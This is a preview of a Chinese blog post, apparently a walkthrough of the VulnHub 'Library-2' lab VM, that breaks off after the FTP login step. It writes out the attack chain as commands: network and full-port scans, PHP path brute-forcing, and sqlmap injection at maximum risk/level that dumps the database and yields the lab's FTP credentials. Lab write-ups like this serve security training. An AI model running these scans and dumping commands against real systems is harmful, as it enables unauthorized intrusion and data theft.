史上最具参考性的云计算和网络安全技术实践博客。
今天看啥  ›  专栏  ›  云计算和网络安全技术实践

vulnhub之Library-2的实践

云计算和网络安全技术实践  · 公众号  ·  · 2024-07-22 09:00
    

文章预览

本周实践的是vulnhub的Library-2镜像, 下载地址,https://download.vulnhub.com/thelibrary/Library-2.7z, 用workstation导入成功, 做地址扫描,sudo netdiscover -r 192.168.220.0/24, 获取到靶机地址是192.168.220.128, 接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.220.128, 发现靶机有21端口的ftp服务,80端口的http服务, 对http服务做php路径暴破,dirb http://192.168.220.128 -X .php, 获取到http://192.168.220.128/library.php, 用burpsuite访问,在页面上随便点击个国家, 把访问请求改成POST方式,保存到req.txt文件, 尝试SQL注入暴破, sqlmap -r req.txt --dbs --batch --risk 3 --level 5, 获取到数据库library, 继续对数据库library进行暴破, sqlmap -r req.txt -D library --dump-all --batch --risk 3 --level 5, 获取到ftp服务的用户名密码,globus/AroundTheWorld, ftp登录靶机,ftp 192.168.220.128, 查看到当前是http服务主页面目录,而且 ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照
总结与预览地址:访问总结与预览